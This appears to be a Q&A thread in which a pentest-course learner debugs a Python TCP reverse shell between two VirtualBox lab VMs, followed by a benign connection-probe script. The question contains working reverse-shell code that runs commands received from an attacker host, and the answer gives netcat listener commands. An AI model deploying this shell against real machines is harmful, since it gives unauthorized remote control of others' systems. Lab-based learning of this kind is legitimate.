
I'm very new to sockets and am currently taking an online course for offensive pen tests. One of the lessons is TCP reverse shells. I am running two scripts on separate virtual machines (using VirtualBox), one being the attacker and another being the target. The attacker script is running just fine; however, the client is outputting the error:

```
Traceback (most recent call last):
  File "C:\Users\Home\Desktop\TCP_RevShell.py", line 22 in <module>
    main()
  File "C:\Users\Home\Desktop\TCP_RevShell.py", line 21, in main
    connect()
  File "C:\Users\Home\Desktop\TCP_RevShell.py", line 6, in connect
    s.connect(('10.0.2.15', 8080))
  File "C:\Python27\lib\socket.py", line 228, in meth
    return getattr(self._sock,name) (*args)
error: [Errno 10061] No connection could be made because the target machine actively refused it
```

And my code:

```python
import socket
import subprocess

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.15', 8080))

    while True:
        command = s.recv(1024)

        if 'terminate' in command:
            s.close()
            break
        else:
            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send(CMD.stdout.read())
            s.send(CMD.stdout.read())

def main():
    connect()
main()
```

I don't know if you need to see the other script to answer my question, if so, please tell me. Any help would be greatly appreciated, ~Spiralio.

Spiralio

1 Answer

Make sure you can ping between the virtual machines. If so, try something simple like a netcat listener and attempt to connect to that.

You can run `nc -lp 8080` on the attacker and then `nc 10.0.2.15 8080` on the victim (assuming you're on Linux).

Those two steps will help you isolate the issue. If ping doesn't work, most likely your network isn't properly configured. Failing netcat points more towards a firewall of some sort. From a quick glance and knowing nothing more about your setup, I'd assume your Python script is fine and that you don't have the 2 VMs properly configured to communicate.

Make sure the IP networks are the same, that they are on the same VM network (set in VirtualBox settings), and, as mentioned above, that there are no firewalls running.

Danny Flack
  • The attacker is on Linux, whilst the target is on Windows. Is there any alternative? Thanks for the response :) – Spiralio Sep 09 '17 at 05:37
  • Yep! Ping still works. You can do some magic with PowerShell to replace nc?.. Or, since you're already learning pen testing and such, just install https://eternallybored.org/misc/netcat/ on Windows and use that. – Danny Flack Sep 09 '17 at 05:40
  • Thanks, trying that now! – Spiralio Sep 09 '17 at 05:49
  • Ok, so I used the 'ping' command on both sides, and they both returned with a 0% loss. Unless I'm missing something, it seems to be working properly... Are there any other tests that I should run? – Spiralio Sep 09 '17 at 05:58
  • Yeah, I'd agree that it is. Other than the nc, make sure you turn off Windows Firewall for all domains – Danny Flack Sep 09 '17 at 06:00
  • Should I post the attacker's code? Maybe that would help. – Spiralio Sep 09 '17 at 06:01
  • The firewall is turned off on both VMs – Spiralio Sep 09 '17 at 06:02
  • Yeah, go ahead. – Danny Flack Sep 09 '17 at 06:03
  • Sorry, can't comment above yet. Try changing the IP on the attacker side from 10.0.2.15 to 0.0.0.0 or just use the empty string. – Danny Flack Sep 09 '17 at 06:24
  • Same error on victim's side, nothing appears on attacker. – Spiralio Sep 09 '17 at 06:44
  • The only thing I can think of now is to just make sure your IP addresses are right? I tested the scripts here, they both worked for me. Probably no hidden firewalls because you're getting 'actively refused'. Also, you're running the attacker before the victim right? – Danny Flack Sep 09 '17 at 06:51
  • It's really nice to know that the scripts all work, meaning that the course hasn't lied to me... I'll run down all the possible solutions one last time tomorrow. I don't know what network settings I should use... Thanks for the feedback. And yes. – Spiralio Sep 09 '17 at 07:03
  • Okay, glad to help the best I can. Oh yeah, and on line 6 of the victim, remove the `s =`. It should just be `s.connect()` with no assignment. Everything else was good. Here's an article to help with networking: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/ – Danny Flack Sep 09 '17 at 07:04
  • That was a typo on the site, my bad. My code does not have s = s.connect in it – Spiralio Sep 09 '17 at 16:57
  • Perfect, did some quick checking. What network mode are your VMs in? You can find that under VM Settings -> Networking -> Attached To: – Danny Flack Sep 09 '17 at 17:30
  • It's set to NAT – Spiralio Sep 09 '17 at 22:45
  • Ok, that could be the issue. VirtualBox usually prohibits incoming connections of any sort in NAT mode. Change the interface to internal network on both VMs and make sure the names are the same. – Danny Flack Sep 09 '17 at 23:36
  • Ok, I'll try that. – Spiralio Sep 10 '17 at 06:05
  • Now that I've changed it, a new error message shows: error: "[Errno 10051] A socket operation was attempted to an unreachable network" – Spiralio Sep 10 '17 at 15:45
  • Yeah, your VMs probably don't have proper IP addresses now; when NAT was turned off, so was DHCP. Make sure you've manually set up the IP address, network, and subnet on each machine. Then use the ping test to ping each VM from the other one and make sure they can reach each other. – Danny Flack Sep 10 '17 at 16:30
  • What should I set those to? The same thing on both VMs? Any article that can help me with that? – Spiralio Sep 11 '17 at 01:46
  • There are a lot of networking articles. It's mostly up to you. I'd say you should set your network to 10.10.10.0/24 or something like that. So, from there set both VMs' network and subnets to 10.10.10.0 and 255.255.255.0. As for IP, set the victim to 10.10.10.1 and the attacker to 10.10.10.2. You can change that up, but anything will work so long as it's valid. – Danny Flack Sep 11 '17 at 03:36
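
The two errors seen in this thread (10061 "actively refused" and 10051 "unreachable network") point at different layers, and a small connectivity probe can tell them apart when netcat is not installed. The following is an added example, not code from the question, the answer or the course; it is written for Python 3 (the thread uses Python 2.7), and `probe`, `demo` and the `ADVICE` wording are names and text chosen here for illustration.

```python
import errno
import socket

# Windows error numbers quoted in the thread, plus their POSIX equivalents.
UNREACHABLE = {errno.ENETUNREACH, errno.EHOSTUNREACH, 10051, 10065}

ADVICE = {
    "open": "a listener accepted the connection",
    "refused": "a host answered, but nothing is listening on that port there "
               "(start the listener first; check its bind address and VM network mode)",
    "unreachable": "no route to the target (check IP address, netmask and VM network)",
    "timeout": "no reply at all (packets are being dropped, e.g. by a firewall)",
}

def probe(host, port, timeout=2.0):
    """Attempt one TCP connect and classify the outcome."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:      # Errno 10061 on Windows / ECONNREFUSED
        return "refused"
    except socket.timeout:
        return "timeout"
    except OSError as exc:
        if exc.errno in UNREACHABLE:    # Errno 10051 on Windows / ENETUNREACH
            return "unreachable"
        raise
    finally:
        s.close()

def demo():
    """Constructed local test: probe one port with and without a listener."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))     # port 0: the OS picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    with_listener = probe("127.0.0.1", port)
    listener.close()
    without_listener = probe("127.0.0.1", port)
    return with_listener, without_listener

if __name__ == "__main__":
    for state in demo():
        print(state, "-", ADVICE[state])
```

Running `probe()` from one lab VM against the other's address and port gives the same classification as the ping and netcat steps in the answer: "refused" means the packets arrived somewhere and the problem is the listener or the address, while "unreachable" means the interface addressing needs fixing first.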